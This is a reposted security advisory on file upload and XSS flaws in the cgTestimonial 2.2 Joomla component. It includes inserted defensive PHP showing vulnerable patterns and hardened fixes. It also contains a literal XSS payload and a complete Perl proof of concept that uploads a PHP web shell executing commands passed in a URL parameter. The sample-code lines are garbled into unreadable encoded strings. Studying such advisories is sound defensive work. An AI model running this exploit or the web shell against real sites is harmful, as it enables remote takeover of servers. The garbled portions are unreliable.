[Repost] Joomla Component cgTestimonial 2.2 Multiple Remote Vulnerabilities
Posted: 2010-8-7 16:03 2366
I. ABOUT THE APPLICATION
________________________

The cg_Testimonial component is a tool for adding testimonials submitted by users from the frontend and for managing and publishing testimonials from the backend.

This Joomla extension lets website users submit a testimonial form with several fields on one of your site's pages and enables the adding of testimonials by either users or the admin.


II. DESCRIPTION
_______________

Some parameters are not properly sanitised. The following vulnerabilities can be exploited by guest users.


III. ANALYSIS
_____________

Summary:

A) Multiple Arbitrary File Upload
B) XSS


A) Multiple Arbitrary File Upload
_________________________________

The usr_img parameter in cgtestimonial.php (frontend) and in testimonial.php (admin, without checks) is not properly sanitised. The only check performed is on the Content-Type HTTP field, which is supplied by the client.
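As an added illustration for defenders (this is not cgTestimonial's own code), the following PHP shows the weak pattern the advisory describes, an upload handler that trusts the multipart Content-Type header, next to a hardened replacement that validates the file contents and never lets the client choose the stored name or extension. The field name usr_img and the directory name user_images come from the advisory; the function names, size limit and allowed-type table are assumptions.

```php
<?php
// Added example, not part of cgTestimonial. Field name 'usr_img' is from the
// advisory; everything else (function names, limits, directory) is assumed.

// --- Weak version: the pattern the advisory describes ---------------------
// $_FILES['usr_img']['type'] is copied straight from the client's multipart
// part header, so a PHP file sent with "Content-Type: image/jpeg" passes, and
// keeping the original filename lets "evil.php" land in a web-served directory.
function weak_save_upload(array $file, string $dir): ?string
{
    if ($file['type'] !== 'image/jpeg' && $file['type'] !== 'image/png') {
        return null;
    }
    $dest = $dir . '/' . basename($file['name']);
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

// --- Hardened version ---------------------------------------------------------
function safe_save_upload(array $file, string $dir, int $maxBytes = 2 * 1024 * 1024): ?string
{
    // 1. PHP's own upload status, a size cap, and proof the path is a real upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if ($file['size'] > $maxBytes || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }

    // 2. Detect the type from the bytes on disk (libmagic), never from the header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    $allowed = [                      // detected MIME => extension WE assign
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
    ];
    if ($mime === false || !isset($allowed[$mime])) {
        return null;
    }

    // 3. Require a parseable image header. This rejects plain text with a forged
    //    prefix; a valid image carrying a script in its metadata still passes,
    //    which is why step 4 and the no-execute directory matter.
    if (getimagesize($file['tmp_name']) === false) {
        return null;
    }

    // 4. Server-chosen random name and extension: the client filename never
    //    reaches the filesystem, so no ".php" (or ".phtml", ".phar") can be stored.
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($dir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);               // readable, never executable
    return $dest;
}

// Both the frontend (cgtestimonial.php) and the admin path (testimonial.php,
// which the advisory says has no checks at all) should call the same function:
// if (isset($_FILES['usr_img'])) {
//     $stored = safe_save_upload($_FILES['usr_img'], __DIR__ . '/user_images');
// }
```

The upload directory itself is the second half of the mitigation: user_images should be served from a location where the script engine is disabled (for Apache with mod_php, `php_flag engine off` in that directory's .htaccess; for nginx, simply not routing that location to PHP-FPM), so that even a file that slips through validation is returned as bytes rather than executed.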

   

   

B) XSS
______

The url parameter in video.php is not properly sanitised before being printed on screen.
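The reflected XSS above, shown as an added PHP example that is not cgTestimonial's video.php: the vulnerable pattern interpolates the raw url parameter into an attribute, so a value beginning with `">` closes the attribute and the tag and the rest is parsed as markup. The hardened version first validates the value as an absolute http(s) URL and then escapes it for the attribute context. The parameter name url comes from the advisory; the iframe markup, function names and the optional host allowlist are assumptions.

```php
<?php
// Added example, not cgTestimonial's own video.php. Parameter name 'url' is
// from the advisory; the surrounding markup and function names are assumed.

// --- Vulnerable pattern: raw parameter written into an attribute -------------
function render_video_unsafe(string $url): string
{
    return '<iframe src="' . $url . '" width="425" height="344"></iframe>';
}

// --- Hardened: validate, then escape for the HTML attribute context ----------
function render_video_safe(string $url, array $allowedHosts = []): string
{
    $parts = parse_url($url);
    if ($parts === false) {
        return '';                                   // malformed
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    $host   = strtolower($parts['host'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true) || $host === '') {
        return '';                                   // rejects javascript:, data:, relative values
    }
    if ($allowedHosts !== [] && !in_array($host, $allowedHosts, true)) {
        return '';                                   // optional: only known video providers
    }
    // Encode quotes, angle brackets and ampersands so nothing in the value can
    // terminate the attribute or the tag; invalid UTF-8 is substituted, not dropped.
    $safe = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<iframe src="' . $safe . '" width="425" height="344"></iframe>';
}

// Demonstration with a constructed payload shaped like the advisory's PoC.
$payload = '"><script>alert(\'xss\');</script>';

echo render_video_unsafe($payload), "\n";
// <iframe src=""><script>alert('xss');</script>" width="425" ...>  -> script runs

echo render_video_safe($payload) === '' ? "[rejected: not an http(s) URL]\n" : "[unexpected]\n";

echo render_video_safe('https://example.com/watch?v=1&x="y"'), "\n";
// <iframe src="https://example.com/watch?v=1&amp;x=&quot;y&quot;" width="425" ...>

echo render_video_safe('https://example.com/v/1', ['example.com']), "\n"; // allowed host
echo render_video_safe('https://evil.example/v/1', ['example.com']) === '' ? "[rejected host]\n" : '';
```

Escaping alone would already neutralise the PoC; the scheme check is there because a value that survives escaping can still be `javascript:` or `data:` when it is used as a URL, and a host allowlist is the strongest option when the page only ever embeds a few known providers.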

   

   

IV. SAMPLE CODE
_______________

A) Multiple Arbitrary File Upload

682K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4m8G2j5#2)9J5k6i4y4S2L8s2k6S2N6r3!0J5k6h3k6J5k6i4y4@1j5g2)9J5k6h3&6W2N6q4)9J5c8W2m8G2b7#2)9J5k6r3y4Y4g2r3g2K6N6r3W2E0L8$3&6A6j5h3H3J5i4K6u0W2x3W2)9J5k6i4m8D9i4K6u0W2N6s2S2@1i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.

B) XSS

0b0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3V1k6H3j5i4c8Z5i4K6u0r3j5$3!0E0M7r3!0F1k6h3&6@1M7#2)9J5c8X3y4G2L8g2)9#2k6X3y4Y4N6r3g2K6N6r3W2E0L8$3&6A6j5h3I4Q4x3V1k6$3K9h3c8W2L8#2)9J5k6i4m8Z5M7q4)9K6c8Y4g2J5L8q4)9K6c8l9`.`."><script>alert('xss');</script>


V. FIX
______

No fix.

   

################################ PoC-cgTestimonial2.2.pl ################################

#!/usr/bin/perl
#
# PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component
#
# Author: Salvatore Fresta aka Drosophila
# Email:  salvatorefresta@gmail.com
#
# Date: 06 August 2010
#
# http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command
#

use IO::Socket;


$usage = "\ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta\n".
         "6e5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4S2L8s2k6S2N6r3!0J5k6h3k6J5k6i4y4@1j5g2)9J5k6h3&6W2N6q4)9#2b7$3&6Q4y4f1y4F1".
         "Usage: perl PoC-cgTestimonial.pl <hostname> <path>\n\n";

$#ARGV == 1 || die $usage;

my $host      = $ARGV[0];
my $path      = $ARGV[1];

my $stop      = 0;
my $rand      = "master".int(rand 150);
my $shell     = "<?php echo \"<pre>\"; system(\$_GET['cmd']); echo \"</pre>\"; ?>";
my $filename  = "evil.php";

my $code      = "--AaB03x\r\n".
                "Content-Disposition: form-data; name=\"usr_img\"; filename=\"$filename\"\r\n".
                "Content-Type: image/jpeg\r\n".
                "\r\n".
                "$shell\r\n".
                "--AaB03x--";

my $pkg       = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1\r\n".
                "Host: $host\r\n".
                "Content-Type: multipart/form-data; boundary=AaB03x\r\n".
                "Content-Length: " .length($code). "\r\n".
                "\r\n".
                $code;

my $socket = new IO::Socket::INET( Proto=> "tcp",
                                   PeerAddr=> $host,
                                   PeerPort=> "80"
                                  ) or die "\n[-] Unable to connect to $host\n\n";

print "\n[+] Connected\n";
print $socket $pkg;

$pkg = "GET ".$path."components/com_cgtestimonial/user_images/".$filename." HTTP/1.1\r\n".
       "Host: $host\r\n\r\n";

print $socket $pkg;

while ((my $rec = <$socket>) && $stop != 1) {
  if($rec !=~ /302 Found/) {
    $stop = 1;
  }
}

if($stop != 1) {
  print "[-] Shell not uploaded\n";
  close($socket);
  exit;
}

print "[+] Shell uploaded on ".$host.$path."components/com_cgtestimonial/user_images/".$filename."\n".
      "[+] Disconnected\n\n";

close($socket);
